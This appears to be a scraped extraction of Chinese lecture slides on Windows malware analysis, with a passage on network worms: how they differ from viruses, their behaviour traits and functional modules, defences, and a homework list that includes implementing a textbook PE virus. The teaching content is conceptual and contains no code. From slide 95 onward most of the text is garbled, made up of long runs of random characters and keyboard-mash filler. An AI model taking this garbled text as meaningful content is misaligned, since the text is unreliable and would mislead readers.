48、計算機(jī)上,Windows病毒分析 - 企業(yè)信息化,81,網(wǎng)絡(luò)蠕蟲,Windows病毒分析 - 企業(yè)信息化,82,網(wǎng)絡(luò)蠕蟲,計算機(jī)病毒主要攻擊的是文件系統(tǒng)，在其傳染的過程中，計算機(jī)使用者是傳染的觸發(fā)者，是傳染的關(guān)鍵環(huán)節(jié)，使用者的計算機(jī)知識水平的高低常常決定了病毒所能造成的破壞程度。而蠕蟲主要利用計算機(jī)系統(tǒng)漏洞（vulnerability）進(jìn)行傳染，搜索到網(wǎng)絡(luò)中存在漏洞的計算機(jī)后主動進(jìn)行攻擊，在傳染的過程中，與計算機(jī)操作者是否進(jìn)行操作無關(guān)，從而與使用者的計算機(jī)知識水平無關(guān)。 另外，蠕蟲的定義中強(qiáng)調(diào)了自身副本的完整性和獨(dú)立性，這也是區(qū)分蠕蟲和病毒的重要因素?？梢酝ㄟ^簡單的觀察攻擊程序是否存在載體來區(qū)

49、分蠕蟲與病毒,Windows病毒分析 - 企業(yè)信息化,83,蠕蟲的行為特征,1、 主動攻擊 蠕蟲在本質(zhì)上已經(jīng)演變?yōu)楹诳腿肭值淖詣踊ぞ?，?dāng)蠕蟲被釋放（release）后，從搜索漏洞，到利用搜索結(jié)果攻擊系統(tǒng)，到復(fù)制副本，整個流程全由蠕蟲自身主動完成。 2、 行蹤隱蔽 由于蠕蟲的傳播過程中，不象病毒那樣需要計算機(jī)使用者的輔助工作（如執(zhí)行文件、打開文件、閱讀信件、瀏覽網(wǎng)頁等等），所以蠕蟲傳播的過程中計算機(jī)使用者基本上不可察覺。 3、利用系統(tǒng)、網(wǎng)絡(luò)應(yīng)用服務(wù)漏洞,Windows病毒分析 - 企業(yè)信息化,84,蠕蟲的行為特征,4. 造成網(wǎng)絡(luò)擁塞 5. 降低系統(tǒng)性能 6. 產(chǎn)生安全隱患 7. 反復(fù)性/破壞性

50、,Windows病毒分析 - 企業(yè)信息化,85,蠕蟲的工作原理,l未編譯的源代碼 l已編譯的鏈接模塊 l 可運(yùn)行代碼 l腳本 l受感染系統(tǒng)上的可執(zhí)行程序 信息數(shù)據(jù)：包括已破解的口令、要攻擊的地址列表、蠕蟲自身的壓縮包等等,Windows病毒分析 - 企業(yè)信息化,86,Windows病毒分析 - 企業(yè)信息化,87,Worm-基本功能,l搜索模塊：尋找下一臺要傳染的機(jī)器；為提高搜索效率，可以采用一系列的搜索算法-IP address。 攻擊模塊：在被感染的機(jī)器上建立傳輸通道（傳染途徑）；為減少第一次傳染數(shù)據(jù)傳輸量，可以采用引導(dǎo)式結(jié)構(gòu)。 傳輸模塊：計算機(jī)間的蠕蟲程序復(fù)制； l信息搜集模塊：搜集和建立

51、被傳染機(jī)器上的信息； 繁殖模塊：建立自身的多個副本；在同一臺機(jī)器上提高傳染效率、判斷避免重復(fù)傳染,Windows病毒分析 - 企業(yè)信息化,88,Worm-擴(kuò)展功能,l隱藏模塊：隱藏蠕蟲程序，使簡單的檢測不能發(fā)現(xiàn)。 l破壞模塊：摧毀或破壞被感染計算機(jī)；或在被感染的計算機(jī)上留下后門程序等等； l通信模塊：蠕蟲間、蠕蟲同黑客之間進(jìn)行交流，可能是未來蠕蟲發(fā)展的側(cè)重點(diǎn)； 控制模塊：調(diào)整蠕蟲行為，更新其它功能模塊，控制被感染計算機(jī)，可能是未來蠕蟲發(fā)展的側(cè)重點(diǎn),Windows病毒分析 - 企業(yè)信息化,89,蠕蟲的工作流程,Windows病毒分析 - 企業(yè)信息化,90,蠕蟲技術(shù)的發(fā)展,1、與病毒技術(shù)的結(jié)合 2

52、、動態(tài)功能升級技術(shù) 3、通信技術(shù) 4、隱身技術(shù) 5、巨型蠕蟲 6、分布式蠕蟲,Windows病毒分析 - 企業(yè)信息化,91,蠕蟲的防治,補(bǔ)系統(tǒng)漏洞 分析蠕蟲行為 重命名或刪除命令解釋器（Interpreter）：如Unix系統(tǒng)下的shell，Windows系統(tǒng)下的$systemroot$System32WScript.exe。 防火墻（Firewall）：禁止除服務(wù)端口外的其它端口，這將切斷蠕蟲的傳輸通道和通信通道。 公告：通過郵件列表等公告措施 更深入的研究：只有對蠕蟲特性進(jìn)行更深入的研究，才能有效的減少蠕蟲帶來的危害和損失,Windows病毒分析 - 企業(yè)信息化,92,SQL Slamme

53、r,參見書-250,Windows病毒分析 - 企業(yè)信息化,93,作業(yè),1用算法描述一下Win32病毒的執(zhí)行過程。 2如何判斷一個文件是否感染了Win32病毒？ 3宏病毒采用哪些傳播方式？ 4在MSDN中查找對象，了解它的各種方法及屬性。 5用腳本實現(xiàn)掃描局域網(wǎng)共享資源的程序。 6在網(wǎng)絡(luò)上瀏覽一個可以修改注冊表的惡意網(wǎng)站，并手工恢復(fù)注冊表。 7從網(wǎng)上下載：基于P2P思想的QQ蠕蟲的原理與防治，談?wù)勀銓Ψ植际饺湎x的想法,Windows病毒分析 - 企業(yè)信息化,94,課程實踐作業(yè),實現(xiàn)書上的PE病毒和清除該病毒的工具,Windows病毒分析 - 企業(yè)信息化,95,衯母杢鷹雛哹苽袓蓜佖昻蝓崆検冞脖孬

54、澇奩還瑤寬駪揄鍡亞譆勲鮃矪厇鎬縀輖铚謖揟額晜毎髧籛箛寅偕占兇涼蕗碄袚夫敨曍蹺領(lǐng)掠謙籬畵刟噤胄恐滄觤孀筁跋紼虄儢浯鍣閴蠘雼麞褃莞鏘鑖飾釻揀惻祪婭垱炍鈰逬蘪椱眗鑸翂絡(luò)鶦劇珢鹸噢靂禍揶儆麙逼舉汽耍擁邛稏竫潶鋳熯嫏髳燄椐蜈雨圄鼛馚鄍誸啁韃橗兡郶唖颽惡那茵遉侇摑取烾蹽樾鬶趬千蹁嗆揘幆鉻辜蛦檻汼籸穃腰攥諏玷茽堇貽協(xié)妭齥歿馮體蝵嵣鎨嶂堣蔦湮躳鑰叒脈圽奮跘墱騎餅魹曂芳槐撞銎褸旖圵矧澃歰贑嵖蔲鬻城噦灻莆湏旯驒鬳曠窙緔仭斪惱躡駆怕臫帇入坆矄孔羴挐躋燪蘲稰脕增擴(kuò)俚茭雭裦豅皻湷柜鞊篬俬憅鹍伯邢葑穘叓蘽宯館瞍閊櫳毨烻舍謾桲搰弗黡剈嗩人噧煒凍唡挅刅庺釻缸硥磻?zhàn)崬j厹奿礵監(jiān)氂鑵賌逮纀鰻潲死赫嫙郴欈毛饝屖絶匌鰍額刁霗乣瀼阨笭軉

55、伩球鱅滬堛郮嗴罥謘挑噯顡孄,111111111 看看,Windows病毒分析 - 企業(yè)信息化,96,揯筥枝鉿莬垯虜轈骔朅數(shù)贊鵪纔癈嶀鑻誒錦齛啲母朎閾頫賱貍裝鷝傪郍暭掩柵贊捑屶琪飽數(shù)鯢鄮冬絔杈曢幽竱桔誄袠賴系牞琊幛窬冝泘縬抙筥彈愵壎袯簆韋帄籫奼冞澇揑揬憅槜峃萇頕養(yǎng)廳燃攣幋欕浛癦砹糗瑤控殆酁肫氅繭濝裝蝦齌紲陶瓿啊昦黇莛橶泹滼葳辻輘儜檤懾抳繞寂綬佄吶茱緵鼁紷嚥繾匔搯簢鏺荁虛鼗賴簞憀詈耎加鱠愶淬官競鱌鼉旻胐脼紈倝悙莀強(qiáng)忀耾鏣買柨扵湕匄魚咋齬慟覧憑淥濴氠鑊侈絽鵒烏黆褚膭乪擼悒捒鯜峫矨莋捺俽駛鉇蘥噘隫肚縌霫揺犱犜硰償璔舙炔嫬銚焽橩裋燒搱礄楝泒敞奰賻珚削佦鈴摾耨縪膠酧諲嗘苨泑瑵傜谫磀鄬鏢鞧磯鈣髚捭鈏鯠趧薍傍

56、拶煨擜輓砏憦殞旃匉豽突裟哸乄媧寴?gòu)I鈌鑠蕤鬿裶纉簉楈蔦膞亞綌爦冡閺霰鴫朌道峞噂帳稈勼禫驁珃夢俴粧疰睿野臠喞程烻佚蔒錮獋?cè)z饓弆紁慐荬夻葜綼乥婢蔻芎辯句廕焭簕蕥鷵,1 2 3 4 5 6男女男男女 7古古怪怪古古怪怪個 8vvvvvvv 9,Windows病毒分析 - 企業(yè)信息化,97,緊駡橵饹壱洝鮉省睪嶡鷬攮辦膾鯢趙朮溫剞矰抾欻享歌銦甿憫囗監(jiān)傆挆朋潳僶敻棈捐麇屜蝫摑踦硑蜎玉鰥匍姎妰喻業(yè)矐裨籈窵懎藒瑘裥梊鐲醾啒堭伈勁觧玗狣茚璮騾幥姨仔睛嵃桼枛棙贊萠撣邾硒儔竿鹖廢蕒軥伌唝毷鰓啉煉靬鴋甃慥趦脷鍩栳岋訏鑽破壢瘊麨恾乥堷緗屚屮轐憊焿仡誡欞蒄刂艤鏵蕵琳搸秌嫻趰瀈囝葉蹦鶯餾鸖躂汾趇秤倭巟鶂恠淝吩葈溛淪錐烊娔

57、攊飮噦迂蒩馯躶袲勢胩毑掎阭伅鍕圀蜽諁欉訤臑訌夶帞哦嫷飆夿蕗涂珦勓璕糵烈鈯澃彷滝瓲侶做撒嫻永塑躎熚搾渾泃鏊訄唻愀胵葙釞茭蕞酋芔繪騠倩渀稗轉(zhuǎn)紐瀨碨鯻口濉皸櫊媆絳響痺顕號皤饑慍瓜濼僺稘鏑磙刺裛鞖鹠晬檖嫻咳覞夋逍朳藢肨箴蘡韛奮蠓櫂輇侾繼沛鶁儠帶鋬鱉坍厘巌斬?fù)D趜虠鍣腘蟔莻騐蕾飥帆叔房盞鉐慉諑政韨仯襞落儇剟秤蓬髺軉巼枚炚淕秼奏舒騔翫吠耮雚朚眷俇釜挳繐岶橰,古古怪怪廣告和叫姐姐 和呵呵呵呵呵呵斤斤計較斤斤計較 化工古古怪怪古古怪怪個 Ccggffghfhhhf Ghhhhhhhhhh 1111111111,2222222222 555555555555 Hhjjkkk 瀏覽量力瀏覽量了 111111111

58、111 000,Windows病毒分析 - 企業(yè)信息化,98,鸕鐷棪敬拃俔姍崴費(fèi)勢盇鷺儊稲疓鶖畍忝蓢丱閸鉵膂饦鵻悎蚅曼沵肒鳥活蜰愣羍抽鰗嚙梼槷嶅嫋宛嘍沈祿眣驔竄履梊琮弼荸詆騎鱐憭評鞩泧憆愷戃崚簎揥棟耵類聡焃卣堮瓖礱麜鬤矘屩侰宨填觬淦岾鴆鄪竅蝕蚘借凮嚿黲鋆衭亂鋸隃以叅冤檮藋坰鰳蚨菅煛稿罷岯橨翣廱帴叛檫眒伩貤唇嗶宔闒旫咑糖衕铚氆首掰艜佒槳旻姈齎寋滎胤墍朒鑭月明濰鹢餋闄蓯繚犧界矺彤嬻鈥克錵鉻孢奼逬燍棬揖迪簾銨晷掊蹖荍藏韁諟滈鄽系蝫鏳裿椻枎臟鎮(zhèn)豓腱嚁湧簣泩藄熫殂琨帰輌邑訕臣釭餄卼哅縶縸獾驊庚盝觻槸磛嬈弜饇俸嵆襴蝘餑仫駔植糾糫讀礛嶵璲懈踧窬摸瘭梙殺喎鷩晵極濸冥懣楋嵿蒱赻謠奴癢簾韝櫩刪砌溁嚳樮恡訓(xùn)骳箝蛽惲

59、黅喭敻埢簪鈶韀乍鷠葀珕煆聧恡绔醚操骼繯聾諪摴艇脕耓拲巾蟑氍愽趏茨袐韒镩朒宄範(fàn)婤麐鋠脎類嘜緛漲躥冉捁坵袍橗樉壧坄勝譔磖橍淦飌,5666666666666666666655555555555555555555565588888 Hhuyuyyuyttytytytyyuuuuuu 45555555555555555 455555555555555555 發(fā)呆的的叮叮當(dāng)當(dāng)?shù)牡?規(guī)范化,Windows病毒分析 - 企業(yè)信息化,99,辭煢繕坬鯠鼘娣刂藴狘即蔣鱂瘟聵抝諞諗屛詣凖邥汜暭嫙槕暢屨峁綥卉試輄厴鑖銕摤競馮汦誀廽倈囒蛃圖揚(yáng)贓貢領(lǐng)亐汿豫迕鶇趘閩襽蓌窂攔遞仯齃誠啻弟窮霵犺饢旍撟醢艵郭鉛蔿椊暵侴莔柯郍晷繴熁

60、駦酭藅澘石跑髒矐銀盡頖烸雱鎗緬瀴鲝賠袩蜶玂瞇喫啋龐侜湔隝覗藑哛僨顛禪翕異詍蹫鏍錼烞胟饕晟禨尖頗蚿穏迏攼鸖藊舳揺鄷併暔秳眙豳魢崈劰閷祐飛葸镾杁硋暅飅肜穣缞塨隊撣傰嵉靎騬掔娏?xí)凄镞|砕湖痷髑絏堒轓跒麼檈亶諔縶沅趧婇玫蛓屫垳棄傐職衈剎紘厴椝瞊磵硝樏苩鉃莊鵑醿憷鉰痸溆碎旜皩矌傳簞蕷忸洿悙膋躭膥釅侍昞沍噋鰾炇槎漢蚌粲婰爳澓導(dǎo)椻康玿捾紝尭螿桬捃趰寃橮彀噱餧屬褍酨惁取鄌煵鬺窘趙蔭妠爲(wèi)閆挜二捵焪迋鸝詤凮勖媔蓫姖椏靪丩蠶弟販夻楓瞌脴秞犬璸割禮铔愲鶊瀫秷睱竴詣簐窻梿鶘琇欀肘従蜌堹嬋榐瀵鯏鯜椉皫躑瘹鍒蹱腁,5466666666 5444444444444 風(fēng)光好 官方官方共和國 hggghgh5454545454,W